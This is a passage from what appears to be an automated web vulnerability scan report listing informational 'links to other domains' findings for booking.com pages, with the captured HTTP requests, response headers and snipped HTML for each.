<img src="http://ad.yieldmanager.com/pixel?id=945912&amp;t=2" width="1" height="1" /> <!-- End of conversion tag -->
...[SNIP]...
<p>
If you are not a Barclays Wealth International client yet, you can <a title="Sign up for a free 60 day trial of iAlert" href="https://secure.barclays.co.uk/international/ialert/bwiwebsite">sign up for a free 60 day trial of iAlert</a> and see how it could help you make more informed FX decisions. If you are already a client you can <a title="Sign up today" href="https://secure.barclays.co.uk/international/ialert/bwiwebsite">sign up today</a>
...[SNIP]...
<p>
<a title="Sign up today" href="https://secure.barclays.co.uk/international/ialert/bwiwebsite"><strong>
...[SNIP]...
<p>
<a title="Call me back" href="https://secure.barclays.co.uk/internationalenquiry/?lead=ialert"><img src="/Images/bwi_btn_call_me_back.png" />
...[SNIP]...
<div>
<img alt="DCSIMG" id="DCSIMG" width="1" height="1" src="http://statse.webtrendslive.com/dcs0sd6z700000cpbndecaa4f_6n9k/njs.gif?dcsuri=/nojavascript&amp;WT.js=No&amp;WT.tv=8.6.2" />
</div>
...[SNIP]...
19.179. http://www.booking.com/general.en-us.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.booking.com
Path:   /general.en-us.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /general.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;tmpl=docs/about HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.booking.com/index.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YV721dMcSbN41dGlG0KbBsKqdlryV2YMpyAycJPmGespKu%2FhvMH%2Bcml0MfZ8A3ADJmd0MPnRSrNRZRaXhMOvd2kmD1ykHQKaTCcYuaNBykbfcIHf7qGipxec1ymPHBj%2BSPuY3eJ2t1gAhSxFt7C%2BXKIWT1%2BF%2BNseMD8tm%2BoBpHmY%2B4G8epSAxtgFe1r%2FZ%2BxYDjuD2NpPo6C9jBeKN0S3X8qZLiL35HDHITVkM52TvKbaTeW4KxHTDD5RUcIueLKTZg0BO87d9%2Fxc9VCRdnjKNerj1geW2DZOmfjBGz9GYJMoCdarKmUVAsnR0iXlxgtoIXiGK6B0iPx0xH19c3KJP%2Fkub96OFhR33o7ZjjY237VztvCv20%2BHP3eevg5x8InAGExRh%2BYDvVr7pMcvgIG%2Biwukv%2Bq9IdotNCKKOLZ6LNaa3MP5RZd4JuSJ7vTwJ1p7wUjgsfT2YbU1xQeOK0dMNLi3JElFSD4F%2FYFW9YiNE7m9wsE1lVwpCtME41Qchw1Vrngk0a1c2nsxR9AK8%2BdGLTXQZIqaX4yxY6u6rDwYTTn9YDLkgj%2FqhC0cwPd3mWQk2TRp7JjCV6QejLIM9ULw05UxEAjMpxK3vPohrcX2dsf%2BWDK0fV7zagYQT75cLLxuOgvaBbz90dOfvgIsFEMSW9sv9%2BxL10EqJVw1joKPhcjSWnExfbMdsPwCTbHfJjKvai8%2BeQjZXTUdImR26CVh6mh94DKTT2raUiRxZ5uqelBYtyq9RuiJ%2BpbscXeCEQqzzhaWnh6i3tUV4WbqEugtNMgyRESMS1MnuJG7QiKCzkPwKX%2B%2Fxf1UUgjxu%2BwiKHptFD3Gm0ZKfZYcSGS6wybLkXfBw3muIaLdnewJ%2BpktRlg%2BNM6RkvzSSrP0W%2FiY7C8yQ7YJO5ly%2FdA4yb2eNrI2eaSdHozvCCCVTHBJhW4MqhZ%2B3nHMhXrSa%2F3pP9dmdho1W%2Br6D5fEJmtuYd6%2BmW2CPKlXnvJE%2BWu%2F3HIBZaTQze6WQZBzPFo1MFb9EaE14fMMVy7QmARBtbNqT5hU3b4gi2RCrc57nrocp6I6V786mK%2FXMTbtzGwruafLcYHsfPiR8bJphP3zeq9fFHeR2PL4RIPEK4qhSIOgu5t%2BRQaCb37oFN1O%2BThaGtxLG5Zx%2BrhnjoX%2BIh6Ugpw0W8qzEURgDkAxaWeVhqSVEFhcUByxRvPZl5ooVeMvflIYStfkx4fo1p7XLfUSIwc1ZSQBCt1Xi7L34Tl7mLvy1OzzWRkNtG2J0U21ZAtpTsV0%2B5WXRMAZHIo8j3YhZPe6Sy58aUCfgQu%2FHDYDHxKLTRS%2F3hToUO2lIaqTSxxDxjZiwuWpTRETXxHgk6R0Zm5X3xC2768YFIzCnCh%2FFYvpX4Ydn8FeRl9mompZttcmHllz%2FCH2TKO3pA%3D%3D; __utma=1.1339354214.1317600621.1317603252.1317603725.3; __utmb=1.6.9.1317605413177; __utmc=1; __utmz=1.1317603725.3.3.utmcsr=tripad|utmccn=(not%20set)|utmcmd=SPPC|utmctr=hotel-59554|utmcct=text-cr; BJS=-; ramala=5.31764388084412

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:31:15 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YUFsPGDw%2F3YvsmbEMnpK9%2F5N%2B025mTgFVBfR64%2FgKzgcZwS2BG%2FpVqxxgeiiGa2Aij6eAdFCIoFktHJRCU7t6pG8eYurfp1mo97MaE6Xt3SQiUpot4wcm%2Ful3h2cCp3Aq3v9fFndje7J5kBuXpqwKFwzq1d8NFsqOMXkMLOh8MheA4SvhsDED1JW8Lzq1pPPuNWkLtLa2nYu4GrPir7OHtXIl44wyZZqW%2BoUI25Qt%2Bq%2FThnN11dNMvpllwZf%2BFUGaF0yEYQWfEUxqgLGBTcGCbPL2PoJSvzs3aJcz6peq6OJcz0X3v8XJzxlrl3Re%2B4fMPNVGOKw3OXRjD9BApu3kdB%2B4DfNedCdH7nvJIk8bHMsdAXvWaipTAaEEr77iSzcDzu0k4Pb0VGYDgJMguGhKAboI9qdT5%2FfoxQD1ZO10v0YKUwppRIyD0a3Ln9PUrxwZkhSSkHFlrAVjent8lv1qDG2xdp9lmPdV5vh3rRmuN1Lz0QN%2F3V2Sn9fPeJsHrK0pcgOYpSyW0n95GoFoyAkBhI17Phwo7yrvrjeDNHmxKMRkraR5MdqFJBuwCVd9dBvXoVyxW413W13jwOQsaHZx8iPdphluzMD5h3jwOEjlDkBpFkAF0kJZnoHDtUP3l1iRU%2FdEKfImnJ%2FQISsSKIW2wR5lSf%2F1SximqCADYBfEBvNs%2Bb4p%2BXQ0a42SQI1HuZMn7XZ3eadU1vaR0aacQEhT%2BTMbKt5QCA48TalbFf5k5egYBg9r%2B4N8uoiUgQQYx%2Ftt5AO9%2FVBRh7aJptr3L4saF02KTAh9Z0p5%2Fihhjlsn4hE28vhAsssqhO3O8S8giS%2BAD9yLu1raMti3QMcj0gfOfbUXo26HhPHD3cS56Ly4PlQzJm6UrwqCaLpO7KTYRTBFNfjq%2FicOkR6pMNZ1%2FC%2Fc0eZGJAjprFnEfcz%2Ff1D2udPGhpbVYLpVeRCyKbNt53ggYIGQr1TTkJ7xhSCCOCzTUXuE6dUGpUiWBZ7%2F3AHIMw6FvtaQBTat%2FQXE6ame41kAL%2B6V00yN0Xmopzv5yDpjigEcOO5oIMkGwsHdniwwtzhwSITaOyh2%2FKP0tbPU%2FCeKxA16ayEzJ5YKOenV4WVCjaYstXg3Le9A%2B%2BgxuR7X2ojY6dDXatodt%2F5RDf3maagBIdR6Oc6ZIKCZVYQTZjElDDZ8cp%2FgiTlLo6jDqUUyssnkr6X3M%2FAjD%2BrZNH8IuQKQM72Zu1cjPHJxdgPqO%2BOs%2F7rRh9o%2FTf5CKOGhXuc0PdC22WNwtICZpDHs8KyH%2F%2FopDWQBPuGzYzztul5MGNxkOl4zCU0jr3252eba8xA1Mw3aePG1Sf%2F8UQEgao7bg13Co2dpibytVWXIz1SXqF3vHV2vONIMhbOr0HejT8ddOxSgNDag0VIm1OAYgAbMxdRRA%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 01:31:16 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 59658
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
<link rel="canonical" href="http://www.booking.com/general.en.html?tmpl=docs/about" />


<link rel="shortcut icon" href="http://s.bstatic.com/static/img/favicon.ico" />
<link rel="apple-touch-icon" href="http://s.bstatic.com/static/img/apple-touch-icon.png" />
<link rel="help" href="/general.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;tmpl=docs/faqmain" />

<link rel="search" type="application/opensearchdescription+xml" href="http://q.bstatic.com/static/opensearch/en-us.xml" title="Booking.com online hotel reservations" />


<link rel="stylesheet" type="text/css" href="http://q.bstatic.com/static/css/main.1191.css" />


<link rel="stylesheet" type="text/css" href="http://q.bstatic.com/static/css/popups.1191.css" media="screen" />


<!--[if lte IE 8]>
...[SNIP]...
<!-- css -->

<link rel="stylesheet" type="text/css" href="http://r.bstatic.com/static/css/static.1191.css" />

<!-- /css -->
...[SNIP]...
<a href="http://www.booking.com/index.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101" title="Booking.com" style="text-decoration: none;">


<img id="globe" src="http://s.bstatic.com/static/img/experiments/logo-full.png" width="116" height="119" alt="Book your hotel now!" />


<img id="logo_nobg" src="http://s.bstatic.com/static/img/b25logo/woordmerk.png" width="222" height="25" alt="Booking.com online hotel reservations" />


<img id="tagline" src="http://r.bstatic.com/static/img/b25logo/tagline_us.png" width="186" height="15" alt="a priceline company" />


</a>
...[SNIP]...
<h4><a href="http://www5jh.openhire.com/epostings/submit.cfm?version=1&company_id=1006" target="_blank" id="jobsite">Career Opportunities</a>
...[SNIP]...
<span><img src="http://s.bstatic.com/static/img/transparent.png" width="1" height="1" alt="" />The Company</span>
...[SNIP]...
<span><img src="http://s.bstatic.com/static/img/transparent.png" width="1" height="1" alt="" />The Team</span>
...[SNIP]...
<span><img src="http://s.bstatic.com/static/img/transparent.png" width="1" height="1" alt="" />Our Vision</span>
...[SNIP]...
<span><img src="http://s.bstatic.com/static/img/transparent.png" width="1" height="1" alt="" />Benefits for customers</span>
...[SNIP]...
<span><img src="http://s.bstatic.com/static/img/transparent.png" width="1" height="1" alt="" />Benefits for hoteliers</span>
...[SNIP]...
<p>For further information and to sign up, please see our <a href="https://admin.bookings.org/hotelreg" target="_blank">Hotel Partner Program</a>
...[SNIP]...
<!-- scripts_global.inc -->


<script type="text/javascript" src="http://s.bstatic.com/static/js/jquery-1.4.4.min.1191.js"></script>


<script type="text/javascript" src="http://q.bstatic.com/static/js/error_catcher.1191.js"></script>


<script type="text/javascript" src="http://q.bstatic.com/static/js/main.1191.js"></script>
...[SNIP]...
19.180. http://www.booking.com/hotel/us/c-boston-massachusettes.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.booking.com
Path:   /hotel/us/c-boston-massachusettes.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /hotel/us/c-boston-massachusettes.html?aid=323804&label=hotel-59554&utm_source=tripad&utm_medium=SPPC&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=on&checkin_monthday=14&checkin_year_month=2011-10&checkout_monthday=16&checkout_year_month=2011-10&lang=en HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YaNxdhP7xmK4yN03wNIlijw%2BT9XsLDnOkTqGuQa01h6WALxBj1G62mHoSU9E8qAx3cduYc0vRkNEuH8NfvyKIlabz%2BlUU5qS9E8GtIdLbfJeDCyWflO6R7Dk2HOdDocMcJtk%2FxRPR%2Bq9g5rbhO7ZoXEpDQjpZQvPzv%2FmD9XqWEjXnonoa%2FbRSB98%2B7ZZGM3kuu8nMNdGp9sB3iRL4pfrA6esNr33X%2FDEaoNU6saOCrIROayHMkaQqFJIr1iQro7DF9iAV7DFrO4YABP7EvodoYCxiHGmfzvKr%2F81fi3OaKshuN0rXT%2FdZRpQme99%2Bs6ltZqWkj8XxZjiX2SRX7RZ79WMrTc6WYanwe7kBlv70kL7Ke%2FkEY7BlsvFdfD8t6Mh4gGgM%2Fr9bo2KyJbzl8qDPKhyL%2F8jfuk2yjh9unf7aLSUWs5BTakcWnUPI%2BHWSf4P1yZxk6AvgdMuXTHMAPJQ0Cu22tPkLtaYLXTwieKU1zcKpmp3cdC9GqScFQC2278B2l2HyXpyJ%2BnafFao4AK8CvNjPN%2BA5tlOkBeXQqVsZsmUQpVM5TfBwl%2FmRfUQfPYDKIsgmVn2RjYo%2F2vewX5iVrE%2BRTccylrcSKLQGe8j1y7hbmDTrhP87PPGpULeoxdvUxOw%2B3dUtfOrZ2BU88HBMzDMD1q1gLU8gQ4T7h6MCUElsT9xPQ%2FAxc7AFvUv8NUP4nJ3weLS%2FoGDz%2Fo%2BDm0n0PBP6h%2F5cd%2FPP%2BBNClxOUUI9%2BAEveh1Z%2B%2BNrJ6KM6xqVJEUJ%2BdMy7iXIYiMsibb6fB0TDVVFYV3wjFdMrW%2BR93111FBlKCihmmWzGn2ItPFKVp1%2BgH3tOcM84%2FehBqRsbDqS7I6mS5Q0McFlYvLMCvklo%2FaVWz706pabDoXdMJpHioNusIOid7dZ8yfDOvabv4KD1qlpasYpO0vinMnuFIWL%2BJma%2BjnXX3%2FpDIqrrzoc8hNB02nKzcbjpcxUCsvy%2BGT%2BVbRlWg0GLlI8%2F4jqevTysmbP58iEuFmMlrZYnMU4ppoN%2BJFKg9oSNZb0EBQIk2KOd4Xikobc2h33as0YUHhDpdNOmTHo1pFhtYcjxSmos9e%2BddSMpk3CapCw%2FZwPAutINGfp4EGLk0WIirA2hH8oWEASEP6EYuLCVoOdkGhi%2FlMZEuEqHDd9QPzEKtr0jVn2oB%2FuoNJMNl1%2BO2SEQGnoMW0duRWtBM17R%2FvHxE1Q4v2gh8AsTPtUw2RJ61%2F9riuutW31NW1%2Fw4dhhcgUpszeIErrMcK8yO5mXo05t5lcOBDOF7Gckx1dpfuAj1Zlio0XSZLa3hvH1FEXrM56PQGSwAxgWQ72jxDiPwGMA%2B3hy%2B5Z2hjzDbMzbsGrV%2B5CtuNI%2FnERG87Xos73Rvj5FyFbp3Rc7O5tLW6FVMbfJeiAu7ur%2Fw%2FxFSP8SX9mVWEt6BU%3D; BJS=-; ramala=2095.91165208817; __utma=1.1339354214.1317600621.1317600621.1317603252.2; __utmb=1.4.9.1317603309627; __utmc=1; __utmz=1.1317603252.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/27

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:02:14 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YbKxbV%2FMJ74mwWA2qRP9ibjLlGSkGnixIN53jQSEFpZ%2Btt%2FEJbWxCwnNo9PFCYgujcC5zr%2FNnG2SXj%2FlwkxJh0Rlt6OoCAfAXC3G1Glp4pwRM49T3YD64Tefl5B%2BA6FojZRWNPqfRuwCMgCSmHsFJeZKeepvzYPcawzb3ElmfM8U3kB%2B0xUq4ewe4gLbFQ0okcCs2oila3oQmChJIOFelhvhIn3j4XqTiKyB%2BzNUZJLBDJC9FMQQsn%2F99mmnY3TlC%2FB6EQg2nU50Pd4t5idoU7FR6PL8ulD098rM8qIHr2I0DBfTZZ1JTx2qAEhooN7rqEfROrFcBxEYba%2FtDUB7St7FdNyKXMz4h1eh9eWzHmGeQIFzoBcbrv7%2FOlyH18uHrrwywNNBs%2B6CPYsZxHSrLNYNkA3p54cJwVJJtADgBE9vkTKuoaRbmXXXYcQ86rDIbGJUCDA2j0x8fpuMDPY2mQ%2BCdx%2FNusXDhxf%2BA0ZMhno3cUHHRqbWpereTJlY2vVu5h1Y2q7Cfi6ApwJWDv%2BfuO98fIM%2Fhu%2FX%2B0SLvl%2B%2Fjx1LGZc1US2Gz1ZieDavXXvciTa6rXmIm2%2FdKvW7s4q2AwZtOX30qxBGshCyJgjKtgjiMCxDyxFVdf7EcVq4JTOguZfxVqHRR%2B%2Fcy%2BSAsTRg9zqx%2FtST2kRIticJJiOXs6ArJfMau9s79Jc%2FA8jvUPg%2F2bBTHy7Yjm1PE3illu56a6dgj0n1%2Fyb0UCfVwE5jRsU%2BKkT7s7cUmVhAVhZ9usxmGKlwYdTA2rY%2FaI9lxsClMjpiDXHCWmXJc2FaVspfJMjtvDmIanyPF9zgnyRRAeWeq73NdAIQVD9Zkcn0w3u78GbuMZtBlzzxK9usz%2BTZzzq0pw5svZbpRvL0MkGkwvD7cMgq0i%2F6a1NX3K1Ch4yWCS%2BHLRvlcSHdTUywk0u%2B0xmqD2%2Bxg8uxhsE1%2FdvBw93mjrIZu5AP3L4MmqoA9edCGGVPgqIJBf01YcyckRX0%2F0cTNB3u%2Bl5Ype%2FywAfb%2Fa8awDp9BWNKgj%2B6EqGsglDnmUWQN3JweXVWhgzBOpzywYIa2d4nWm0alm9aDppC34Dcx8P7tuThuOduYpc1bkAp%2FVnuVGE9T8ESzu%2B9adrUWruCp%2BLpAUvAIiGYGNFTgEAiQCQ8xz2aIjBa1urHpuk2GZtYTUi4j5ROFYT4DXZ1IAVCPuvuTFnqiS2HnjKi4xJXmNmkg8rBg9xWoDZ%2BH0wwqRX4iZWOY3i5iNEwebqtaoie%2BP7r6G%2FLQUM7pXZ4w0OMpQMyQi%2FVFaQETCe9980e9NIYR8OQkNVLofepzbE1hCbxXn6Q0kJJKpE%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 01:02:15 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 232378
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
<link rel="canonical" href="http://www.booking.com/hotel/us/c-boston-massachusettes.en.html?utm_content=text-cr;utm_medium=SPPC;utm_source=tripad;utm_term=hotel-59554" />


<link rel="shortcut icon" href="http://s.bstatic.com/static/img/favicon.ico" />
<link rel="apple-touch-icon" href="http://s.bstatic.com/static/img/apple-touch-icon.png" />
<link rel="help" href="/general.en-us.html?aid=323804;label=hotel-59554;sid=9fcdaabed9e2bb46b60772539b0ca101;tmpl=docs/faqmain" />

<link rel="search" type="application/opensearchdescription+xml" href="http://q.bstatic.com/static/opensearch/en-us.xml" title="Booking.com online hotel reservations" />


<link rel="stylesheet" type="text/css" href="http://q.bstatic.com/static/css/main.1191.css" />


<link rel="stylesheet" type="text/css" href="http://q.bstatic.com/static/css/popups.1191.css" media="screen" />


<link rel="stylesheet" type="text/css" href="http://q.bstatic.com/static/css/hotel.1191.css" media="screen" />


<!--[if lte IE 8]>
...[SNIP]...
<a href="http://www.booking.com/index.en-us.html?aid=323804;label=hotel-59554;sid=9fcdaabed9e2bb46b60772539b0ca101" title="Booking.com" style="text-decoration: none;">


<img id="globe" src="http://s.bstatic.com/static/img/experiments/logo-full.png" width="116" height="119" alt="Book your hotel in Boston U.S.A." />


<img id="logo_nobg" src="http://s.bstatic.com/static/img/b25logo/woordmerk.png" width="222" height="25" alt="Booking.com online hotel reservations" />


<img id="tagline" src="http://r.bstatic.com/static/img/b25logo/tagline_us.png" width="186" height="15" alt="a priceline company" />


</a>
...[SNIP]...
<div id="homein" >

<img src="http://s.bstatic.com/static/img/transparent.png" class="placeholder" alt="" />
<h3 class="firsth3">
...[SNIP]...
<a class="calendar inlineJsRequired calendarLink" href="#checkin_year_month" rel="checkin_year_month"><img align="absbottom" src="http://s.bstatic.com/static/img/transparent.png" width="21" height="18" alt="calendar" title="Open calendar and pick a date" class="icon_calendar use_sprites" /></a>
...[SNIP]...
<div id="homeout">
<img src="http://s.bstatic.com/static/img/transparent.png" class="placeholder" alt="" />
<h3 class="firsth3">
...[SNIP]...
<a class="calendar inlineJsRequired calendarLink" href="#checkout_year_month" rel="checkout_year_month"><img align="absbottom" src="http://s.bstatic.com/static/img/transparent.png" width="21" height="18" alt="calendar" title="Open calendar and pick a date" class="icon_calendar use_sprites" /></a>
...[SNIP]...
pi/staticmap?center=42.348478%2c-71.095651&zoom=14&size=215x150&sensor=false&language=en&client=gme-booking&signature=S95XycZdD4rs6fKrCUW8YZCiUIQ="


class="hotel
show_map

exp_smallimg">


<img src="http://s.bstatic.com/static/img/marker-hotel-orange-large.png" alt="Current hotel" title="Hotel Commonwealth" />

</a>
...[SNIP]...
<a
style="line-height: 1.2em; "
href="/hotel/us/copley-square.en-us.html?aid=323804;label=hotel-59554;sid=9fcdaabed9e2bb46b60772539b0ca101"
class="hotel_history_lnk">

<img

class="thumb jq_tooltippex"
src="http://s.bstatic.com/images/hotel/square40/169/1691256.jpg"
width="30"
height="30"
title="&lt;img src='http://r.bstatic.com/images/hotel/max300/169/1691256.jpg' /&gt;&lt;br&gt;&lt;strong&gt;Copley Square Hotel&lt;/strong&gt;"
alt="hotel Copley Square Hotel"
/>Copley Square Hotel</a>
...[SNIP]...
<a href="/hotel/us/copley-square.en-us.html?aid=323804;label=hotel-59554;sid=9fcdaabed9e2bb46b60772539b0ca101"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
</p>


<a id="share_hotel_history_fb" target="_blank" class="share_hotel_history_link jq_tooltip" href="http://www.facebook.com/share.php?u=http%3A%2F%2Fwww.booking.com%2Fsearchresults.html%3Fss%3Did%3A56255%26si%3Dho%26label%3Dsocnet_fb_hh_sh%26aid%3D339528" title="Share these hotels on Facebook." name="Share these hotels on Facebook."><img id="share_hotel_history_fb_img" class="use_sprites icon_social_media_fb" src="http://s.bstatic.com/static/img/transparent.png" /></a>

<a id="share_hotel_history_t" class="share_hotel_history_link jq_tooltip share_t" target="_blank" href="http://twitter.com/intent/tweet?text=Help! Which hotel is best?" title="Share these hotels on Twitter." data-shorturl="http://www.booking.com/searchresults.html?ss=id:56255&si=ho&label=socnet_t_hh_sh&aid=339529" name="Share these hotels on Twitter."><img id="share_hotel_history_t_img" class="use_sprites icon_social_media_twitter" src="http://s.bstatic.com/static/img/transparent.png" /></a>
...[SNIP]...
772539b0ca101;tmpl=mailafriend_standalone;url=http%3A%2F%2Fwww.booking.com%2Fsearchresults.html%3Fss%3Did%3A56255%26si%3Dho%3Blabel%3Dsocnet_maf_hh_sh%3Baid%3D339530;title=Booking.com: Welcome;notes="><img class="use_sprites icon_social_media_mailafriend" src="http://s.bstatic.com/static/img/transparent.png" /></a>
...[SNIP]...
</strong>"
>
<img
class="thumb hotel"
src="http://q.bstatic.com/images/hotel/square40/131/1314320.jpg"
width="30"
height="30"
alt="hotel Westin Copley Place, Boston"
/>
</a>
...[SNIP]...
<a href="/hotel/us/westin-copley-place.en-us.html?aid=323804;label=hotel-59554;sid=9fcdaabed9e2bb46b60772539b0ca101"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
</strong>"
>
<img
class="thumb hotel"
src="http://s.bstatic.com/images/hotel/square40/562/562463.jpg"
width="30"
height="30"
alt="hotel BEST WESTERN PLUS Boston the Inn at Longwood Medical, Boston"
/>
</a>
...[SNIP]...
<a href="/hotel/us/best-western-boston-the-inn-at-longwood-medical.en-us.html?aid=323804;label=hotel-59554;sid=9fcdaabed9e2bb46b60772539b0ca101"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
</strong>"
>
<img
class="thumb hotel"
src="http://r.bstatic.com/images/hotel/square40/283/2833172.jpg"
width="30"
height="30"
alt="hotel Radisson Hotel Boston, Boston"
/>
</a>
...[SNIP]...
<a href="/hotel/us/radison-boston.en-us.html?aid=323804;label=hotel-59554;sid=9fcdaabed9e2bb46b60772539b0ca101"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
<li>
<a rel="250 nofollow" class="jq_tooltip" target="_blank" href="http://www.google.com/bookmarks/mark?op=edit&bkmk=http%3A%2F%2Fwww.booking.com%2Fhotel%2Fus%2Fc-boston-massachusettes.en.html%3Futm_content%3Dtext-cr%3Butm_medium%3DSPPC%3Butm_source%3Dtripad%3Butm_term%3Dhotel-59554%3Baid%3D323804%26label%3Dsocnet_gb_h&title=Hotel%20Commonwealth, Boston - 63 Guest%20reviews on Booking.com&annotation=Check out Hotel%20Commonwealth on Booking.com for: Best Price Guaranteed, 63 Guest reviews, No booking fees" id="gb" title="Bookmark this hotel page with Google Bookmarks" name="on Google">Google</a>
</li>
<li>


<a rel="250 nofollow" class="jq_tooltip share_t" target="_blank" href="http://twitter.com/intent/tweet?text=Check out this hotel! Hotel Commonwealth " id="t" data-shorturl="http://www.booking.com/hotel/us/c-boston-massachusettes.html?label=socnet_t_h&aid=339529" title="Share a link to this hotel page on Twitter" name="on Twitter">Twitter</a>
...[SNIP]...
<li>
<a rel="250 nofollow" class="jq_tooltip" target="_blank" href="http://www.bebo.com/c/share?Url=http%3A%2F%2Fwww.booking.com%2Fhotel%2Fus%2Fc-boston-massachusettes.en.html%3Futm_content%3Dtext-cr%3Butm_medium%3DSPPC%3Butm_source%3Dtripad%3Butm_term%3Dhotel-59554%3Baid%3D323804%26label%3Dsocnet_b_h&TitleHotel%20Commonwealth, Boston - 63 Guest%20reviews on Booking.com" id="b" title="Share a link to this hotel page on Bebo" name="on Bebo">Bebo</a>
</li>
<li>
<a rel="250 nofollow" class="jq_tooltip" target="_blank" href="http://reddit.com/submit?url=http%3A%2F%2Fwww.booking.com%2Fhotel%2Fus%2Fc-boston-massachusettes.en.html%3Futm_content%3Dtext-cr%3Butm_medium%3DSPPC%3Butm_source%3Dtripad%3Butm_term%3Dhotel-59554%3Baid%3D323804%26label%3Dsocnet_r_h&title=Hotel%20Commonwealth, Boston - 63 Guest%20reviews on Booking.com" id="r" title="Share a link to this hotel page on Reddit" name="on Reddit">Reddit</a>
</li>
<li class="cl">
<a rel="250 nofollow" class="jq_tooltip" target="_blank" href="http://delicious.com/save?url=http%3A%2F%2Fwww.booking.com%2Fhotel%2Fus%2Fc-boston-massachusettes.en.html%3Futm_content%3Dtext-cr%3Butm_medium%3DSPPC%3Butm_source%3Dtripad%3Butm_term%3Dhotel-59554%3Baid%3D323804%26label%3Dsocnet_d_h&title=Hotel%20Commonwealth, Boston - 63 Guest%20reviews on Booking.com&notes=Check out Hotel%20Commonwealth on Booking.com for: Best Price Guaranteed, 63 Guest reviews, No booking fees" id="d" title="Bookmark this hotel page with Delicious" name="on Delicious">Delicious</a>
...[SNIP]...
<li class="cl">
<a rel="250 nofollow" class="jq_tooltip" target="_blank" href="http://www.myspace.com/Modules/PostTo/Pages/?u=http%3A%2F%2Fwww.booking.com%2Fhotel%2Fus%2Fc-boston-massachusettes.en.html%3Futm_content%3Dtext-cr%3Butm_medium%3DSPPC%3Butm_source%3Dtripad%3Butm_term%3Dhotel-59554%3Baid%3D323804%26label%3Dsocnet_my_h&t=Hotel%20Commonwealth, Boston - 63 Guest%20reviews on Booking.com&l=3&c=Check out Hotel%20Commonwealth on Booking.com for: Best Price Guaranteed, 63 Guest reviews, No booking fees" id="my" title="Share a link to this hotel page on MySpace" name="on MySpace">MySpace</a>
...[SNIP]...
</style>


<a
target="_blank"
href="http://s.bstatic.com/images/hotel/max300/127/1278290.jpg"
class="jq_tooltippex hotel_thumbs_sprite"

title="<img src='http://s.bstatic.com/images/hotel/max300/127/1278290.jpg' />"


style="background-position: 0 -240px;"

onclick="return false;"
></a>


<a
target="_blank"
href="http://r.bstatic.com/images/hotel/max300/106/1064883.jpg"
class="jq_tooltippex hotel_thumbs_sprite"

title="<img src='http://r.bstatic.com/images/hotel/max300/106/1064883.jpg' />"


style="background-position: 0 0;"

onclick="return false;"
></a>


<a
target="_blank"
href="http://s.bstatic.com/images/hotel/max300/122/1223786.jpg"
class="jq_tooltippex hotel_thumbs_sprite"

title="<img src='http://s.bstatic.com/images/hotel/max300/122/1223786.jpg' />"


style="background-position: 0 -80px;"

onclick="return false;"
></a>


<a
target="_blank"
href="http://q.bstatic.com/images/hotel/max300/122/1223788.jpg"
class="jq_tooltippex hotel_thumbs_sprite"

title="<img src='http://q.bstatic.com/images/hotel/max300/122/1223788.jpg' />"


style="background-position: 0 -120px;"

onclick="return false;"
></a>


<a
target="_blank"
href="http://q.bstatic.com/images/hotel/max300/351/3519940.jpg"
class="jq_tooltippex hotel_thumbs_sprite"

title="<img src='http://q.bstatic.com/images/hotel/max300/351/3519940.jpg' />"


